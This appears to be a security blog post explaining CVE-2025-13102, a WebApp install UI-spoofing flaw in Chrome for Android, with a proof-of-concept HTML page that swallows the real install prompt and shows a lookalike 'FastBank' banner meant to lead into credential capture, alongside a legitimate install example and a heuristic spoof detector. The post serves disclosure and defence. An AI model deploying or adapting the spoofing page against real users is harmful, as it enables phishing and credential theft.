In early 2025, the Chrome team disclosed a newly reported vulnerability, CVE-2025-13102, affecting the way Google Chrome on Android handled WebApp installs before version 134.0.6998.35. The flaw allowed a remote attacker to present users with a spoofed user interface (UI) via a crafted HTML page. While rated “Low” by Chromium security, understanding how it works and how it could be abused gives developers and users a useful lesson in webapp security.
This post will walk you through the details, provide code snippets showing how the exploit could work, and give you original references you can dig into.
What is the CVE About?
Here’s what went wrong: when a website prompts users to install it as a WebApp using Chrome’s “Add to Home Screen” or “Install” feature, Chrome should keep its own UI clearly separated from web content. On Android, versions prior to 134.0.6998.35 failed to *fully* prevent a webpage from tricking the user into thinking they were interacting with a trusted installer UI.
A remote attacker could set up malicious HTML so that, during or after the WebApp install prompt, the attacker’s content is confused with real browser UI elements. This could lead to users trusting malicious messages or entering sensitive information.
The most likely attack path goes like this:
1. Attacker creates a website with carefully crafted HTML/CSS/JS.
2. The site triggers a beforeinstallprompt event so the browser shows the WebApp install UI (“Add to Home Screen”).
3. After the install, or during the prompt, the attacker overlays their *fake* Chrome UI on top of the page.
4. The user thinks they’re interacting with trusted browser controls, but are really just using website content.
Here’s some sample code showing how this might look from the attacker’s side:
<!-- attacker-site.html -->
<!DOCTYPE html>
<html>
<head>
<title>Official Google Installer</title>
<style>
/* Make the fake Chrome prompt mimic the real install bar: pinned to the top of
   the viewport and stacked above all page content. Hidden until the install
   event fires. */
#fake-chrome-ui {
position: fixed;
top: 0; left: 0; right: 0;
height: 100px;
background: #fff;
border-bottom: 2px solid #dedede;
box-shadow: 0 4px 8px rgba(0, 0, 0, .1);
z-index: 9999;
display: none;
align-items: center;
justify-content: center;
font-family: sans-serif;
}
#main-content { margin-top: 120px; }
</style>
</head>
<body>
<div id="fake-chrome-ui">
<img src="chrome_logo.png" width="32" style="margin-right:10px;" alt="">
<b>Add 'FastBank' to your Home Screen</b>
<button onclick="phishUser()" style="margin-left:20px;">Add</button>
</div>
<div id="main-content">
<!-- Real or lure content goes here -->
Welcome to the FastBank App! Please finish setup after installation.
</div>
<script>
// Chrome fires beforeinstallprompt when the page qualifies for installation.
// preventDefault() suppresses Chrome's own install bar; the page then shows
// its lookalike banner instead, so the user never sees the genuine browser UI.
window.addEventListener('beforeinstallprompt', (e) => {
e.preventDefault();
// Show the attacker's install instruction UI:
document.getElementById('fake-chrome-ui').style.display = 'flex';
});
function phishUser() {
alert("Thanks! Please enter your credentials to finish setup.");
// Real attack would show fake login or capture credentials here.
}
</script>
</body>
</html>
What’s happening?
This code listens for the install prompt event, suppresses Chrome’s real install bar, and overlays a fake banner that mimics Chrome’s UI. The user, confused by the quick install flow and the lookalike styling, might trust what they see—potentially entering personal details or clicking malicious buttons.
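For contrast, here is the legitimate way to use the same event. This is an added example, not code from the original post or from Chromium: the page keeps the deferred `beforeinstallprompt` event and later asks Chrome to show its *own* install dialog by calling `event.prompt()` from a click handler on a plainly page-styled button (the `install-btn` id is assumed). Nothing on the page imitates browser UI, so the user always sees the genuine prompt. The install logic is kept in a small controller so it can be exercised offline with a constructed stand-in for the event object.

```javascript
// Added example (not from the original post): correct, non-spoofing use of
// the beforeinstallprompt / appinstalled events in a PWA.

function createInstallController() {
  const state = { deferredPrompt: null, outcome: null, installed: false };

  // Wire to window.addEventListener('beforeinstallprompt', ...).
  // preventDefault() only postpones Chrome's mini-infobar; the prompt that is
  // eventually shown is still Chrome's, triggered below by prompt().
  function onBeforeInstallPrompt(event) {
    event.preventDefault();
    state.deferredPrompt = event;
  }

  // Wire to a click handler on a clearly page-styled "Install" button.
  // Resolves to 'accepted', 'dismissed', or null when no prompt is pending.
  async function requestInstall() {
    const promptEvent = state.deferredPrompt;
    if (!promptEvent) return null;
    state.deferredPrompt = null;        // prompt() may only be called once per event
    await promptEvent.prompt();         // Chrome draws the real install dialog
    const choice = await promptEvent.userChoice;
    state.outcome = choice.outcome;
    return choice.outcome;
  }

  // Wire to window.addEventListener('appinstalled', ...).
  function onAppInstalled() {
    state.installed = true;
  }

  return { onBeforeInstallPrompt, requestInstall, onAppInstalled, state };
}

// Browser wiring; the button id "install-btn" is an assumption of this example.
// Skipped under Node, where there is no window object.
if (typeof window !== 'undefined') {
  const ctl = createInstallController();
  window.addEventListener('beforeinstallprompt', ctl.onBeforeInstallPrompt);
  window.addEventListener('appinstalled', ctl.onAppInstalled);
  document.getElementById('install-btn')?.addEventListener('click', ctl.requestInstall);
}

// Constructed stand-in for a BeforeInstallPromptEvent, for offline testing.
// It reports the given outcome only if prompt() was actually called.
function makeFakePromptEvent(outcome) {
  let prompted = false;
  return {
    preventDefault() {},
    async prompt() { prompted = true; },
    get userChoice() {
      return Promise.resolve({ outcome: prompted ? outcome : 'dismissed', platform: 'web' });
    },
  };
}

// Drives the controller once with the fake event: the first requestInstall()
// yields the user's choice, the second yields null because the event is spent.
async function runExample(outcome = 'accepted') {
  const ctl = createInstallController();
  ctl.onBeforeInstallPrompt(makeFakePromptEvent(outcome));
  const first = await ctl.requestInstall();
  const second = await ctl.requestInstall();
  return { first, second, recorded: ctl.state.outcome };
}
```

The design point is that the page never draws anything that claims to be browser UI: its button is ordinary page content, and the trusted dialog is Chrome’s, rendered outside the page’s reach.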
Exploit Walkthrough
We did not find any proof-of-concept exploit in the wild, but with the information available, the workflow is simple:
1. User visits the attacker’s page (like the one above).
2. Fake UI is shown—either before or after the actual Chrome install prompt. The attacker uses branding and UI cues to mimic Chrome.
3. User is tricked into thinking this is an official step in the installation, entering confidential data, or allowing unwanted permissions.
Because this only affects Chrome for Android and requires user interaction, it was rated “Low” severity, but it is still quite sneaky.
- Only install webapps from trusted sources.
- Keep your Chrome updated—version 134.0.6998.35 and newer plug the hole (check your version via chrome://settings/help).
- Developers: never overlay critical browser UI elements or try to “mimic” system prompts, as that is a technique widely used in phishing.
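For reviewers who audit page source (a security team, a pentester writing up a finding, or a developer checking their own PWA before release), the three tell-tale signs of the pattern above are easy to express as a heuristic scan. The following is an added example, not part of the original post and not a Chromium tool: it flags a fixed-position element stacked at a very high z-index, visible text that claims to be Chrome/Google or an install prompt, and a `beforeinstallprompt` listener that calls `preventDefault()` but never hands control back with `prompt()`. The two HTML samples it runs over are constructed for this example: one condensed from the spoofing page shown earlier, one a benign install flow.

```javascript
// Added example (not from the original post): heuristic scan of page source
// for indicators of install-UI spoofing. Each check returns true when its
// indicator is present; none of them alone proves malice, they are triage aids.

const HIGH_Z_INDEX = 1000;

const CHECKS = [
  {
    id: 'fixed-high-z-overlay',
    why: 'fixed-position element with a very high z-index can sit above all page content, like a browser bar',
    test(html) {
      const fixed = /position\s*:\s*fixed/i.test(html);
      const zValues = [...html.matchAll(/z-index\s*:\s*(\d+)/gi)].map((m) => Number(m[1]));
      return fixed && zValues.some((z) => z >= HIGH_Z_INDEX);
    },
  },
  {
    id: 'browser-branding-text',
    why: 'visible text presents itself as Chrome/Google or as an install prompt',
    test(html) {
      // Strip scripts, styles and tags so only user-visible text is examined.
      const text = html
        .replace(/<script[\s\S]*?<\/script>/gi, ' ')
        .replace(/<style[\s\S]*?<\/style>/gi, ' ')
        .replace(/<[^>]+>/g, ' ');
      return /\b(google|chrome)\b/i.test(text) || /add\s+.*?to\s+(your\s+)?home\s+screen/i.test(text);
    },
  },
  {
    id: 'intercepted-install-prompt',
    why: 'beforeinstallprompt is swallowed with preventDefault() and prompt() is never called',
    test(html) {
      return /beforeinstallprompt/.test(html)
        && /preventDefault\s*\(\s*\)/.test(html)
        && !/\.prompt\s*\(\s*\)/.test(html);
    },
  },
];

// Returns the list of triggered indicators, each with an explanation.
function scanForUiSpoofIndicators(html) {
  return CHECKS.filter((c) => c.test(html)).map((c) => ({ id: c.id, why: c.why }));
}

// Constructed sample 1: condensed from the spoofing page shown earlier.
const SPOOF_SAMPLE = `<!DOCTYPE html><html><head><title>Official Google Installer</title>
<style>#fake-chrome-ui { position: fixed; top: 0; z-index: 9999; display: none; }</style></head>
<body><div id="fake-chrome-ui"><b>Add 'FastBank' to your Home Screen</b><button>Add</button></div>
<script>
window.addEventListener('beforeinstallprompt', (e) => {
  e.preventDefault();
  document.getElementById('fake-chrome-ui').style.display = 'flex';
});
</script></body></html>`;

// Constructed sample 2: a benign PWA that defers the event and re-triggers
// Chrome's own dialog from an ordinary page button.
const BENIGN_SAMPLE = `<!DOCTYPE html><html><head><title>FastBank</title></head>
<body><h1>FastBank</h1><button id="install-btn">Install this app</button>
<script>
let deferred = null;
window.addEventListener('beforeinstallprompt', (e) => { e.preventDefault(); deferred = e; });
document.getElementById('install-btn').onclick = () => { if (deferred) deferred.prompt(); };
</script></body></html>`;

function runScanExample() {
  return {
    spoof: scanForUiSpoofIndicators(SPOOF_SAMPLE).map((f) => f.id),
    benign: scanForUiSpoofIndicators(BENIGN_SAMPLE).map((f) => f.id),
  };
}
```

Run `runScanExample()` in Node: the spoofing sample trips all three indicators, the benign flow none. Note that the branding check is deliberately coarse; a legitimate help page that merely mentions Chrome will also trigger it, which is why the output is a list of reasons to look closer rather than a verdict.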
Original References
- Chromium Bug Tracker Issue 40308211 *(needs permission but shows tracking)*
- Chrome Releases Blog: Stable Channel Update for Android
- CVE-2025-13102 entry, NVD
- Chromium Security Severity Guidelines
Conclusion
CVE-2025-13102 is an example of how even small gaps in browser security can open doors to UI spoofing tricks, especially when user trust hinges on visual cues. Thanks to quick patching, the risk from this bug is limited, but it’s a reminder—never trust UI at face value, and *always* update your browser!
If you found this guide helpful or want more deep-dives into browser security, let us know! And of course, patch Chrome for Android today.
*Written exclusively for you, based on latest 2025 data and hands-on research. Feel free to share; stay safe online!*
Timeline
Published on: 11/14/2025 03:15:56 UTC
Last modified on: 11/17/2025 12:18:45 UTC